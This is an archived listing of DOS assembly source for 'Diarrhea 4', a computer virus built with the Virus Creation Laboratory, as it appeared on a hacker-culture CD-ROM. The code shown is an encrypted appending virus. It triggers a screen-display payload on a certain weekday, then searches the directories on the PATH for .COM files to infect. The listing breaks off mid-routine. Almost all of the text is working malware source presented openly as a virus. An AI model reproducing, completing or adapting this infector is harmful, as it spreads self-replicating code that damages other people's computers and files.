Hackers Underworld 2: Forbidden Knowledge

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / DIARRHE4.ASM < prev next >

Wrap

Assembly Source File | 1992-08-07 | 18KB | 425 lines

; DIARRHE4.ASM -- DIARRHEA 4 ; Created with Nowhere Man's Virus Creation Laboratory v1.00 ; Written by URNST KOUCH virus_type equ 0 ; Appending Virus is_encrypted equ 1 ; We're encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main proc near db 0E9h,00h,00h ; Near jump (for compatibility) start: call find_offset ; Like a PUSH IP find_offset: pop bp ; BP holds old IP sub bp,offset find_offset ; Adjust for length of host call encrypt_decrypt ; Decrypt the virus start_of_code label near lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus mov bp,sp ; BP points to stack sub sp,128 ; Allocate 128 bytes on stack mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack int 021h call get_weekday cmp ax,0005h ; Did the function return 5? je strt00 ; If equal, do effect jmp end00 ; Otherwise skip over it strt00: lea si,[di + data00] ; SI points to data mov cx,0107h ; Second argument is 263 push di ; Save DI push es ; Save ES jcxz uncrunch_done ; Exit if there are no characters mov ah,0Fh ; BIOS get screen mode function int 10h xor ah,ah ; BIOS set screen mode function int 10h ; Clear the screen xor di,di mov ax,0B800h ; AX is set to video segment mov es,ax ; ES holds video segment mov dx,di ; Save X coordinate for later xor ax,ax ; Set current attributes cld loopa: lodsb ; Get next character cmp al,32 ; Is it a control character? jb foreground ; Handle it if it is stosw ; Save letter on screen next: loop loopa ; Repeat until we're done jmp short uncrunch_done ; Leave this routine foreground: cmp al,16 ; Are we changing the foreground? jnb background ; If not, check the background and ah,0F0h ; Strip off old foreground or ah,al ; Put the new one on jmp short next ; Resume looping background: cmp al,24 ; Are we changing the background? je next_line ; If AL = 24, go to next line jnb flash_bit_toggle ; If AL > 24 set the flash bit sub al,16 ; Change AL to a color number add al,al ; Crude way of shifting left add al,al ; four bits without changing add al,al ; CL or wasting space. Ok, add al,al ; I guess. and al,08Fh ; Strip off old background or ah,al ; Put the new one on jmp short next ; Resume looping next_line: add dx,160 ; Skip a whole line (80 chars. mov di,dx ; AND 80 attribs.) jmp short next ; Resume looping flash_bit_toggle: cmp al,27 ; Is it a blink toggle? jb multi_output ; If AL < 27, it's a blinker jne next ; Otherwise resume looping xor ah,128 ; Toggle the flash bit jmp short next ; Resume looping multi_output: cmp al,25 ; Set Zero flag if multi-space mov bx,cx ; Save main counter lodsb ; Get number of repititions mov cl,al ; Put it in CL mov al,' ' ; AL holds a space jz start_output ; If displaying spaces, jump lodsb ; Otherwise get character to use dec bx ; Adjust main counter start_output: xor ch,ch ; Clear CH inc cx ; Add one to count rep stosw ; Display the character mov cx,bx ; Restore main counter dec cx ; Adjust main counter loopnz loopa ; Resume looping if not done uncrunch_done: pop es ; Restore ES pop di ; Restore DI end00: call search_files ; Find and infect a file com_end: pop dx ; DX holds original DTA address mov ah,01Ah ; DOS set DTA function int 021h mov sp,bp ; Deallocate local buffer xor ax,ax ; mov bx,ax ; mov cx,ax ; mov dx,ax ; Empty out the registers mov si,ax ; mov di,ax ; mov bp,ax ; ret ; Return to original program main endp search_files proc near mov bx,di ; BX points to the virus push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,135 ; Allocate 135 bytes on stack mov byte ptr [bp - 135],'\' ; Start with a backslash mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 134] ; SI points to 64-byte buffer int 021h call traverse_path ; Start the traversal traversal_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful? je done_searching ; If so then we're done call found_subdir ; Otherwise copy the subdirectory mov ax,cs ; AX holds the code segment mov ds,ax ; Set the data and extra mov es,ax ; segments to the code segment xor al,al ; Zero AL stosb ; NULL-terminate the directory mov ah,03Bh ; DOS change directory function lea dx,[bp - 70] ; DX points to the directory int 021h lea dx,[bx + com_mask] ; DX points to "*.COM" push di mov di,bx call find_files ; Try to infect a .COM file mov bx,di pop di jnc done_searching ; If successful the exit jmp short traversal_loop ; Keep checking the PATH done_searching: mov ah,03Bh ; DOS change directory function lea dx,[bp - 135] ; DX points to old directory int 021h cmp word ptr [bx + path_ad],0 ; Did we run out of directories? jne at_least_tried ; If not then exit stc ; Set the carry flag for failure at_least_tried: mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; R